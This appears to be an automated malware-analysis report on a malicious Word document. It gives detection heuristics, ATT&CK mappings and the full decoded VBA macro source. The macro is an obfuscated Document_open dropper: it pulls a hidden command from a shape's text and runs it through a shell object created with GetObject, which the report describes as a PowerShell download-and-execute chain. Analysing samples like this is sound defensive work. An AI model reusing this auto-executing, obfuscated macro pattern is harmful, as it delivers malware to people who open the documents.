MALICIOUS
212
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Word document containing VBA macros. The 'Document_open' macro is configured to execute, and heuristics indicate it references PowerShell. The macro appears to construct a PowerShell command to download and execute a payload from a URL, which is a common technique for malware delivery. The ClamAV detection further confirms its malicious nature.
Heuristics 8
-
ClamAV: Doc.Downloader.Powload-6826397-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Powload-6826397-0
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set qSBYKLUwh = CVar(GetObject(hQRkQVKAE + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + QHNQfi)) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7860 bytes |
SHA-256: c19c6308e8f18a5f13c67761ad20f2e57b762121beea19605bf38e9fb86a17d1 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
132 of 200 identifiers look randomly generated (e.g. 'vDjCnCQojnJjw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NFEaPVQU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
KYfWwkB = (pjtTN - Oct(kdCjHGz) * nGdiRlhXE - Sgn(18409089) - 208689627 + Fix(izwBHS) + 465697549 + 234248164 / 143817271 / BDLRw)
Select Case pdGpW
Case 79979582
YsOTPaRi = CLng(279694727)
zwnfAcoz = Int(cmEaXz)
Case 254601901
iawqtSL = Hex(165777637)
twrJE = CStr(144186037 * CByte(PNVKao))
End Select
Set pHjwTS = Shapes("vDjCnCQojnJjw")
On Error Resume Next
biITjW = (GurUHnW - Oct(aLjjNOJAi) * dcojsHtwd - Sgn(332256764) - 162030324 + Fix(IZzjOZ) + 3240303859# + 206458778 / 6301701 / bNzkbzk)
Select Case SiiaGunXC
Case 236301552
IKXWGDG = CLng(226176585)
zkDzsGA = Int(kHfwOjj)
Case 278251514
hTDvrXNEs = Hex(83161682)
qshUO = CStr(38795894 * CByte(hfiizuMmu))
End Select
On Error Resume Next
SchBKhaIh = (BwofQvRtP - Oct(AhKuv) * zcrzm - Sgn(294975674) - 210871166 + Fix(GCTkYfiiU) + 2714993499# + 82359708 / 81731405 / lBWrwTTw)
Select Case RnGIiwRh
Case 23649760
SrZNc = CLng(217696402)
jWSMVh = Int(UNbUHnYM)
Case 4032502
kjiQwjR = Hex(252999247)
DuqMnuKi = CStr(236230833 * CByte(iYvFXnUXw))
End Select
UOFIPPsUjD = "" + drjQWmfi + pvzuw + pHjwTS.TextFrame.TextRange.Text + aLhIiwLL + MKbLhjX + IjEdJZ + pjiFzb + szlusV
On Error Resume Next
NBdEOzABP = (cGDLqsaPt - Oct(WQkuaOlMG) * MPjUzGjEC - Sgn(190578294) - 73952580 + Fix(EquhLBht) + 718497759 + 298000541 / 131006691 / XzRjdANou)
Select Case mNXiOjL
Case 144133493
QikMtA = CLng(300905398)
kiNhT = Int(szApzaBOX)
Case 288079322
DjJdmzhp = Hex(209025790)
MmkXj = CStr(237851761 * CByte(dJhpSSflO))
End Select
On Error Resume Next
Czfawaw = (BEHQtio - Oct(FFhYd) * wTqcQK - Sgn(245320630) - 327782553 + Fix(jElHtGnfR) + 1709588929 + 181731513 / 118185073 / NlKLRcKu)
Select Case IwqzLkWJo
Case 280654779
OaMIb = CLng(307529843)
RaPwBuJGF = Int(FsJnwq)
Case 314665177
QuuDJHlk = Hex(96335752)
mYCkWdt = CStr(132577626 * CByte(JwwpEfF))
End Select
Set qSBYKLUwh = CVar(GetObject(hQRkQVKAE + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + QHNQfi))
On Error Resume Next
NjYQYiv = (GPZwp - Oct(DwEZO) * PBcTid - Sgn(11990677) - 233566723 + Fix(KoqNYSj) + 2294078649# + 132884139 / 171700976 / oZuGQ)
Select Case pVmzJQw
Case 252623661
LEEiv = CLng(212433117)
awaijQ = Int(TNkzGiqGV)
Case 23358256
njwaA = Hex(162204859)
bQGfdlibc = CStr(336215855 * CByte(jhoZdTlZQ))
End Select
On Error Resume Next
fNMqsjkz = (fGMQbtaTo - Oct(QwjMw) * VREIEwuJ - Sgn(342163292) - 300389076 + Fix(tpDqTEm) + 1354189539 + 332150914 / 141616368 / tjRJQBFj)
Select Case ANFXRfrpj
Case 78371194
QiRhi = CLng(247949941)
wswsAP = Int(YUquftDQ)
Case 327187558
fkfYnMz = Hex(247333747)
SXKSkffo = CStr(61148496 * CByte(zINpptLAu))
End Select
On Error Resume Next
tNiRiS = (mWffN - Oct(zVhlkiBT) * CjoBXi - Sgn(322803983) - 256978113 + Fix(UJHno) + 2759832069# + 120809858 / 22369160 / YVoWEavLR)
Select Case puvPucLz
Case 190793277
vWpjdLE = CLng(216866554)
jrTjpc = Int(dffOGLRMz)
Case 53946337
tMLdqpa = Hex(323766170)
jEtsW = CStr(93198004 * CByte(ktWNG))
End Select
On Error Resume Next
jarfBavNH = (zsfCtvl - Oct(Ttroz) * qHmzCnrE - Sgn(76416639) - 202938151 + Fix(nLwoBMmL) + 1693898679 + 25029000 / 29751718 / Kdjcqjkzs)
Select Case HounwKT
Case 224495994
jAOGjmVRh = CLng(32095964)
ZjmKcUW = Int(BUbfwM)
Case 30351874
uNNbsr = Hex(71828591)
wvWwpUR = CStr(17072211 * CByte(PAaBjLdnI))
End Select
On Error Resume Next
LuAht = (HOLfauhWd - Oct(XKKaTDE) * GdCAfdOE - Sgn(90395446) - 210101980 + Fix(wKzZinFv) + 2387458839# + 252634217 / 20016333 / EbnasJwnH)
Select Case NbPpGiiRV
Case 213026766
qfPXk = CLng(179210773)
NITADnwZ = Int(CWvPsYIwY)
Case 65201718
jWMTQWoNw = Hex(155373273)
HiLZz = CStr(143564302 * CByte(Ycqhqj))
End Select
Const lRnGU = 0
On Error Resume Next
uiCNE = (mXkzPJf - Oct(uYtcnn) * YfbFtOz - Sgn(111607547) - 116972739 + Fix(MzTSZ) + 2074257199 + 47617103 / 105793496 / nEzlKqUrF)
Select Case GQqriVz
Case 182627203
KLpGS = CLng(326945963)
JMBVs = Int(MpAVbtQP)
Case 165467083
rnLlVIl = Hex(320532509)
DzFlwwi = CStr(260415652 * CByte(jIpkk))
End Select
On Error Resume Next
qMlIkPDJo = (piAXlNIzd - Oct(RhktR) * XHIjW - Sgn(182931522) - 252636730 + Fix(jfsiiWmId) + 3172426569# + 28807038 / 208257873 / JMDYVJLc)
Select Case brrfs
Case 321366671
HbNvJ = CLng(260908676)
UZOHS = Int(EoplR)
Case 86875087
EIARbOaDA = Hex(283875126)
dpHVU = CStr(281732762 * CByte(dWGjwHCs))
End Select
On Error Resume Next
AfWbbihko = (hzwoqvzCJ - Oct(HqQPiM) * CBawflHB - Sgn(285864586) - 178910948 + Fix(hDiwSHK) + 2402998029# + 156597170 / 188979061 / HVqzAoJP)
Select Case zPvij
Case 91986475
BLpnwUUUG = CLng(248052326)
YJFtoH = Int(uFFilSs)
Case 185490608
hSIENE = Hex(51411148)
Zhpjm = CStr(7498568 * CByte(rOdkGBD))
End Select
On Error Resume Next
UujiQE = (iUWXh - Oct(KcCin) * jIJcn - Sgn(174657452) - 164205528 + Fix(HVvWZUpO) + 3218871609# + 276931549 / 71237545 / RPvXwWrrE)
Select Case wbHLGF
Case 73921951
tDrRwN = CLng(162996569)
wMOvfMXvi = Int(NmdQjh)
Case 228897061
ZTONOkDfw = Hex(46471209)
zSiww = CStr(160062621 * CByte(cJhjEMc))
End Select
nCGOf = Array(vzavU, qSBYKLUwh.Run!(UOFIPPsUjD, lRnGU), MCTiMdcCi)
On Error Resume Next
wwMoaEhzp = (FwudzL - Oct(QkPNwiLXN) * viPlFL - Sgn(197009487) - 275242172 + Fix(TpLXGRnK) + 1685054929 + 67575368 / 116969758 / KkjpHRmAT)
Select Case RMllP
Case 170681575
zlQnSrAE = CLng(85117538)
vJUlN = Int(Zlwivwtrp)
Case 89128625
YwlVCN = Hex(178469286)
YBFrsjl = CStr(306364199 * CByte(qrzQD))
End Select
On Error Resume Next
mEhkF = (wpSjAzujM - Oct(ZkfNO) * kTSuRWu - Sgn(180357933) - 164351423 + Fix(tARWH) + 1961665649 + 137833872 / 316536130 / qURqnaRL)
Select Case PFhMoKT
Case 93918640
LccvqH = CLng(287082227)
tOpCw = Int(jfYISd)
Case 206083779
AKZMTb = Hex(213773508)
HCtMJU = CStr(36544418 * CByte(dKwijDWTT))
End Select
On Error Resume Next
jjhHm = (sGpEidP - Oct(LlZmBlBI) * XmEfnwmo - Sgn(5961812) - 36158181 + Fix(JtwrIiJBl) + 860484459 + 90123145 / 67957502 / OJwlM)
Select Case zIavKVisF
Case 70160032
QdXTb = CLng(120924496)
hdScAXbJ = Int(vQdzAbF)
Case 51792594
jwmVaqDq = Hex(222072795)
jmpnrIDjc = CStr(140096437 * CByte(CTAtn))
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.